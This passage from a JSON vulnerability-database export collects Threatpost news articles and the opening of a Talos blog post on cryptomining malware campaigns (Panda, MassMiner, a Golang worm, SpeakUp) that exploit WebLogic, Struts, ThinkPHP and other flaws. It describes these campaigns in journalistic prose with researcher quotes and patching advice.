24._\n", "modified": "2021-02-17T21:39:10", "published": "2021-02-17T21:39:10", "id": "THREATPOST:555BCC102B10B8C6CABB0054595AC756", "href": "https://threatpost.com/windows-linux-devices-hijacked-in-two-year-cryptojacking-campaign/164048/", "type": "threatpost", "title": "Windows, Linux Devices Hijacked In Two-Year Cryptojacking Campaign", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-13T21:58:43", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. \u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. \u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administers should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that has hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. **__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "modified": "2019-09-17T21:04:35", "published": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:49:59", "bulletinFamily": "info", "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. \u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "modified": "2018-05-03T20:26:37", "published": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-14T22:23:27", "bulletinFamily": "info", "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-7600", "CVE-2020-5135"], "description": "A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.\n\nThe malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching and infecting other vulnerable machines. Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.\n\nAccording to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls \u201cGolang,\u201d originally targeted only Linux machines, but now has spread to Windows and other servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL,\u201d explained the researchers. They added, \u201cWhile the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China.\u201d\n\nThe bad code also uses various older vulnerability exploits in order to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for ElasticSearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. \u201c[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)\u201c; and CVE-2018-20062 for the ThinkPHP framework.\n\nOther exploits that don\u2019t have CVEs are also used to exploit Hadoop, Redis and MSSQL. In the latter two cases, the malware will first try to mount a dictionary/brute-forcing attack to find credentials, and, if successful, it will use a known method for achieving remote code-execution \u201cby dumping the db file into cron path,\u201d according to Barracuda.\n\n\u201cSome of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China,\u201d according to the report. \u201cAs in other families of malwares, it is safe to assume that this malware will keep evolving, employing more and more exploits.\u201d\n\n## **A Golang Malware**\n\nNotably, the malware is written in the Go language (Golang).\n\nGolang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others as the functions imported from other libraries are compiled in the binary itself. It also has a unique way of calling functions and storing symbols and data.\n\n\u201cAlthough the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware,\u201d according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.\n\n## **Under the Hood**\n\nOnce the malware infects a machine, it downloads a set of files that are customized based on the platform it is attacking. One of those files positions the malware for doing more damage than simply installing a cryptominer.\n\nThe file sets typically include the initial loader pacyload, an update script, a cryptominer and its configuration file, a watchdog, a scanner and a config file for the cryptominer, Barracuda noted.\n\nOut of these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.\n\n\u201cIf it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account,\u201d explained the researchers.\n\nThe scanner file meanwhile is the malware\u2019s worm propagation mechanism. It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports back to the C2 about the success.\n\nFor Windows machines, the malware also adds a backdoor user, researchers found \u2013 essentially just adding another user to the system. An init/update script accomplishes this on the Linux side, according to the analysis, by adding authorized SSH key to the system.\n\n\u201cAlthough the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators,\u201d Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Theatpost. \u201cThis can be used for deploying additional attacks on the victim\u2019s machine and network, beyond the scope of cryptomining.\u201d\n\nHe added, \u201cThe cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "modified": "2020-06-25T18:30:59", "published": "2020-06-25T18:30:59", "id": "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "href": "https://threatpost.com/worm-golang-malware-windows-payloads/156924/", "type": "threatpost", "title": "Golang Worm Widens Scope to Windows, Adds Payload Capacity", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-04T07:14:14", "bulletinFamily": "info", "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2016-3088", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-2894"], "description": "LAS VEGAS \u2014 A backdoor trojan dubbed \u201cSpeakUp\u201d has been spotted exploiting the Linux servers that run more than 90 percent of the top 1 million domains in the U.S. It uses a complex bag of tricks to infect hosts and to propagate, which analysts say could indicate that it\u2019s poised for a major offensive involving a vast number of infected hosts, potentially worldwide.\n\nAccording to Check Point research released Monday at the CPX360 event in Las Vegas, SpeakUp (so-named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a cryptomining campaign that is gaining momentum and has targeted more than 70,000 servers worldwide so far in what could be the foundation for a very formidable botnet.\n\nSpeakUp targets on-premises servers as well as cloud-based machines, such as those hosted by Amazon Web Services; and, it doesn\u2019t stop at Linux: It also has the ability to infect MacOS devices.\n\nOded Vanunu, head of products vulnerability research for Check Point, told Threatpost that the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. And, he said that since these software can be deployed on virtual servers, all cloud infrastructure are also prone to be affected.\n\nThe actual trojan itself can affect all Linux distributions and MacOS.\n\n## Infection Routine\n\nThe initial infection vector starts with targeting a recently reported RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command-injection techniques for uploading a PHP shell that serves and executes a Perl backdoor.\n\nThe routine is heavily obfuscated: Using a GET request, exploit code is sent to the targeted server. The resulting uploaded PHP shell then sends another HTTP request to the targeted server, with a standard injection function that pulls the ibus payload and stores it. The payload execution is then kicked off using an additional HTTP request. That executes the Perl script, puts it to sleep for two seconds and deletes the file to remove any evidence of infection.\n\nAfter registering the victim machine with the C2, Check Point analysts found that SpeakUp continuously asks for new tasks on a fixed-interval basis of every three seconds. The C2 can say \u201cno task\u201d \u2013 or, it can tell it to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.\n\n\u201cThe beauty is that the threat actor has a foothold on any infected server,\u201d Vanunu said. \u201cWhich means he can adapt new future vulnerabilities, and deploy the new code, which will attempt exploit further using new techniques. If the threat actor decides to implement some more infection techniques the number of bots could easily scale up.\u201d\n\nThe campaign would be immediately scaled as well, since a threat actor would be able to download a piece of malware to all infected hosts at once.\n\n\u201cThe infected hosts are checking the C2 server for new commands every three minutes,\u201d said Vanunu.\n\n\u201cThe threat actor [may also be able to] sell the infected hosts to any threat actor and deploy any type of malware to the highest bidder,\u201d he added.\n\n## Highly Sophisticated Propagation\n\nSpeakUp also comes equipped with a handy propagation script written in Python; its main functions are brute-forcing administrative panels using a pre-defined list of usernames and passwords; and scanning the network environment of the infected machine. For the latter function, it checks for availability of specific ports on servers that share the same internal and external subnet mask. The idea is to scan and infect more vulnerable Linux servers within its internal and external subnets, using a full bag of exploits.\n\nTo spread, SpeakUp\u2019s propagation code exploits known vulnerabilities in six different Linux distributions, including JBoss Enterprise Application Platform security bypass vulnerabilities (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; a Oracle WebLogic wls-wsat Component Deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and an Apache ActiveMQ Fileserver File Upload RCE vulnerability (CVE-2016-3088).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01154122/SpeakUp-Infection-Rate.png>)\n\nSpeakUp\u2019s daily infection rate (click to enlarge)\n\n\u201cA successful exploitation of one of the vulnerabilities will result in deploying the original ibus script on the exploited server,\u201d according to Check Point\u2019s analysis, which added that it also has the capability to infect Macs.\n\n## A Bigger Threat in the Making?\n\nRight now, the observed file downloads that the backdoor is dropping are simple Monero-mining scripts. However, SpeakUp\u2019s authors have the ability to download any code they want to the servers. Check Point analysts said that the mining code could be a sort of beta test ahead of a much more concerning malware drop to come.\n\n\u201cAt the moment SpeakUp serves XMRig miners to its listening infected servers,\u201d according to the research. According to [XMRHunter,](<https://www.xmrhunter.com/>) the wallets hold a total of around 107 Monero coins right now, which is small potatoes in the grand scheme of things.\n\n\u201cSpeakUp\u2019s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making,\u201d according to the analysis. \u201cIt is hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01153817/SpeakUp-VT.png>)\n\nSpeakUp has no detections in VirusTotal.\n\nThe initial victims have in Eastern Asia and Latin America, but researchers believe that the U.S. could be the next target, if not the rest of the world. Given the impressive propagation tactics, a non-existent detection rate on VirusTotal, and the fact that the threat surface contains servers that run the top sites on the internet, SpeakUp could end up being a very big deal, researchers said: \u201cThis campaign, while still relatively new, can evolve into something bigger and potentially more harmful\u2026[and] at the time of writing this article, it has no detections in VirusTotal.\u201d\n\n## Attribution\n\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, it\u2019s clear that it\u2019s someone or a group with plenty of malware-authoring chops.\n\n\u201cWhile currently we\u2019ve spotted a cryptocurrency mining payload, the most notable aspect is the spreading abilities demonstrated in the code,\u201d Vanunu told Threatpost. \u201cNot only this was highly obfuscated, the variety of exploits used could potentially mean we have a highly skilled threat actor behind it.\u201d\n\nCheck Point researchers were able to correlate SpeakUp\u2019s author with a possibly Russian-speaking malware developer under the name of Zettabit.\n\n\u201cAlthough SpeakUp is implemented differently [than Zettabit\u2019s other code], it has a lot in common with Zettabit\u2019s craftmanship,\u201d according to the analysis.\n\nIn terms of what links Zettabit to this malware, \u201cwe\u2019ve read all of his Hack Forums posts and Github projects, so this avatar definitely knows his way around botnets,\u201d Vanunu told Threatpost. \u201cHe even released a free example of botnet code for anyone to use. And while researching, we\u2019ve identified two unique strings that were mentioned and used by Zettabit himself a couple of time in the past.\u201d\n\n_This story was updated at 2:23 p.m. ET on February 4 to reflect additional details from the researchers. _\n", "modified": "2019-02-04T14:00:15", "published": "2019-02-04T14:00:15", "id": "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "href": "https://threatpost.com/speakup-linux-backdoor/141431/", "type": "threatpost", "title": "SpeakUp Linux Backdoor Sets Up for Major Attack", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2018-01-31T17:59:53", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271", "CVE-2017-3506"], "description": "## The Dark Side of the Digital Gold Rush\n\n \n_This post was authored by [Nick Biasini](<https://twitter.com/infosec_nick>), [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>), [Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and [Josh Reynolds](<https://www.twitter.com/JershMagersh>) with contributions from [Azim Khodijbaev](<https://twitter.com/ashukuhi>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n[](<https://1.bp.blogspot.com/-arFNhXlv5Mw/WnHgQ5o5WDI/AAAAAAAABpc/R8cgpTc4WnsyovMYujbV815KaTNd1mQgwCLcBGAs/s1600/pan-gold_transp.png>)\n\n_ \n_ \n\n\n## Executive Summary\n\n \nThe threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining related attacks have emerged as a primary interest for many attackers who are beginning to recognize that they can realize all of the financial upside of previous attacks, like ransomware, without needing to actually engage the victim and without the extraneous law enforcement attention that comes with ransomware attacks. \n \nThis focus on mining isn't entirely surprising, considering that various cryptocurrencies along with \"blockchain\" have been all over the news as the value of these currencies has exponentially increased. Adversaries have taken note of these gains and have been creating new attacks that help them monetize this growth. Over the past several months Talos has observed a marked increase in the volume of cryptocurrency mining software being maliciously delivered to victims. \n \nIn this new business model, attackers are no longer penalizing victims for opening an attachment, or running a malicious script by taking systems hostage and demanding a ransom. Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining. In these cases the better the performance and computing power of the targeted system, the better for the attacker from a revenue generation perspective. IoT devices, with their lack of monitoring and lack of day to day user engagement, are fast becoming an attractive target for these attackers, as they offer processing power without direct victim oversight. While the computing resources within most IoT devices are generally limited, the number of exposed devices that are vulnerable to publicly available exploits is high which may make them attractive to cyber criminals moving forward. \n \nTo put the financial gains in perspective, an average system would likely generate about $0.25 of Monero per day, meaning that an adversary who has enlisted 2,000 victims (not a hard feat), could generate $500 per day or $182,500 per year. Talos has observed botnets consisting of millions of infected systems, which using our previous logic means that these systems could be leveraged to generate more than $100 million per year theoretically. It is important to note that due to volatility present across cryptocurrency markets, these values may change drastically from day to day. All calculations in this blog were made based on XMR/USD at the time of this writing. \n \nThis is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity. While these are impressive figures, it's also important to factor in a few details that can further increase the value of these attacks exponentially: \n\n\n * The value of many cryptocurrencies are skyrocketing. Monero, one of the most popular mining targets, saw a 3000% increase over the last 12 months.\n * These attacks are much stealthier than their predecessors. Attackers are not stealing anything more than computing power from their victims and the mining software isn't technically malware -- So theoretically, the victims could remain part of the adversary's botnet for as long as the attacker chooses.\n * Once the currency is mined, there is no telling what the attacker might do with it. This could become a long term investment (or even retirement) scheme for these attackers \u2013 sitting on this currency until it hits such a point where the attacker decides to cash in. \n\n## \n\n## Introduction\n\n \nThroughout the past couple of years ransomware has dominated the threat landscape and for good reason. It creates a highly profitable business model that allows attackers to directly monetize their nefarious activities. However, there are a couple of limitations with the use of ransomware. First is the fact that only a small percentage of infected users will actually pay the ransom demanded by the attacker. Second, as systems and technology get better at detecting and blocking ransomware attacks the pool of possible victims is changing. Potential victims in many countries lack the financial capabilities to pay $300-$500 to retrieve their data. Possibly related to these aforementioned limitations, we have begun to see a steady shift in the payloads that are being delivered. This is especially true for some of the most common methods for malware distribution such as exploit kits and spam campaigns. \n \nOver the past several months Talos has started to observe a marked increase in the volume of cryptocurrency miners being delivered to victims. Cryptocurrency and \"blockchain\" have been all over the news over the past several months as the value of these currencies has increased on an exponential path. One of the most effective ways to generate these currencies is through mining and adversaries are obviously paying attention. \n \n\n\n## What is 'Mining'?\n\n \nAt a high level mining is simply using system resources to solve large mathematical calculations which result in some amount of cryptocurrency being awarded to the solvers. Before we get too deep into mining let's address the currencies that make sense to mine. \n \nBitcoin (BTC) is the most well known and widely used cryptocurrency by a wide margin. It's been mined since its inception, but today mining isn't an effective way to generate value. If you look across all of the cryptocurrencies, there are only a couple that are worth mining without specialized hardware called ASICs (Application Specific Integrated Circuits). The differences across the different cryptocurrencies are based on the hashing algorithm used. Some have been specifically designed in an attempt to prevent or hinder the use of such specialised hardware and are more focused on consumer grade equipment such as CPU & GPU hardware. Currently, the most valuable currency to mine with standard systems is Monero (XMR) and adversaries have done their research. In addition Monero is extremely privacy conscious and as governments have started to scrutinize Bitcoin more closely, Monero and other coins with heavy emphasis on privacy may become a safe haven for threat actors. \n \nThere are two ways that mining can be performed, either with a stand alone miner or by leveraging mining pools. Pool-based crypto mining allows you to pool the resources of multiple systems resulting in a higher hashrate and theoretically the production of increased amounts of currency. It's pool-based mining of Monero that we have seen most frequently leveraged by attackers as it allows for the greatest amount of return on investment and the required mining software can be easily delivered to victims. The use of pooled mining also maximizes the effectiveness of the computing resources found in standard systems that attackers attempt to compromise. This is similar to launching Distributed Denial of Service (DDoS) attacks where 100,000 machines flooding a target with bogus traffic becomes much more effective compared to a single system under the attacker's control sending bogus traffic. \n \n\n\n## How does pool based mining work?\n\n \nPool-based mining is coordinated through the use of 'Worker IDs'. These IDs are what tie an individual system to a larger pool and ensures the coin mined by the pool that is associated with a particular Worker ID are delivered to the correct user. It's these Worker IDs that allowed us to determine the size and scale of some of the malicious operations as well as get an idea of the amount of revenue adversaries are generating. For the purposes of this discussion we will be assuming the following: \n\n\n 1. The amount of hashes per second that a typical computer can compute will be assumed to be ~125 H/s.\n 2. While in reality mining does not always guarantee successful generation of the cryptocurrency being mined, we will assume that for our purposes it is successful as it allows for a better understanding of the earning potential for these malicious mining pools.\nThese miners typically operate from the command line and make use of a series of arguments used to establish how the mining should be performed. A typical example of the command line syntax used to execute the mining software and specify the arguments is below: (note that there are variations in the parameter names used based on the specific mining software being used.) \n\n\n[](<https://2.bp.blogspot.com/-ZmEzpdA1pzU/WnG17Z6ncAI/AAAAAAAAAkM/v_-jqvA3Tx4v4Ifg6PSTn6xHAxs92brwgCLcBGAs/s1600/image7.png>)\n\n**Example Command Line Syntax**\n\n \nAs you can see there are two primary argument values required: The URL for the mining pool and the 'Worker ID' that is used to tie the mining activity taking place on the system to a specific mining pool which is used to manage how payouts are conducted. However, through our investigation we have found a plethora of other parameters that attackers or miners can specify in an attempt to hide their activities. If the mining software is executed without these options, victims might notice significant performance degradation on their systems as no computing resource limits are enforced. These options include: \n\n\n * Limits on CPU Usage.\n * Limits on System Temperature.\n * Amount of cores being used.\n * Sleep periods.\nEach mining program comes with its own set of flags that are taken advantage of in various ways by both legitimate and malicious miners. We have observed that these options are typically deployed by the attackers when they achieve persistence (i.e. through the creation of Scheduled Tasks or Run keys that execute the miner using the Windows Command Processor specifying the arguments to use). \n \n\n\n## Origins on the Underground\n\n \nTalos has been observing discussions regarding the use of crypto miners as malicious payloads by both Chinese and Russian crimeware groups. We first observed Chinese actors discussing miners and the associated mining botnets in November 2016 and the interest has been steadily building since that time. \n \nFrom a Russian underground perspective there has been significant movement related to mining in the last six months. There have been numerous discussions and several offerings on top-tier Russian hacking forums. The discussions have been split with the majority of the discussion around the sale of access to mining bots as well as bot developers looking to buy access to compromised hosts for the intended purpose of leveraging them for crypto mining. The popularity increase has also been accompanied with a learning curve associated with mining, including a better understanding around how much coin can be mined and the opportune times to conduct the mining activity. As far as the malware that can be used to conduct mining, most of them are written in C# or C++ and as is common on these forums they are advertised with low detection rate, persistence, and constant development. In many cases we are observing updates to these threats on a daily or weekly basis. \n \nIn general the attackers have been pleased with the amount of revenue the bots generate as well as the potential to grow that revenue. This is indicative of a threat that is poised to become more pervasive over time. Let's take a look at how malicious mining works and the threats that are delivering them. \n \n\n\n## Malicious Mining\n\n \nMalicious mining is the focus of this post since its an emerging trend across the threat landscape. Adversaries are always looking for ways to monetize their nefarious activities and malicious mining is quickly becoming a cash cow for the bad guys. \n \nOver the past several years ransomware has dominated the threat landscape from a financially motivated malware perspective and with good reason. It is an extremely profitable business model as we've shown through our Angler Exploit Kit [research](<https://www.talosintelligence.com/angler-exposed/>) where we estimate that the adversaries behind Angler could have been conservatively making at least $30 million annually. However, with success comes attention and with that attention came an increased focus on stopping this type of activity. Both operating systems and security vendors got better at stopping ransomware before it affected much of the system. \n \nAdversaries are left with an interesting decision, continue leveraging ransomware as a primary 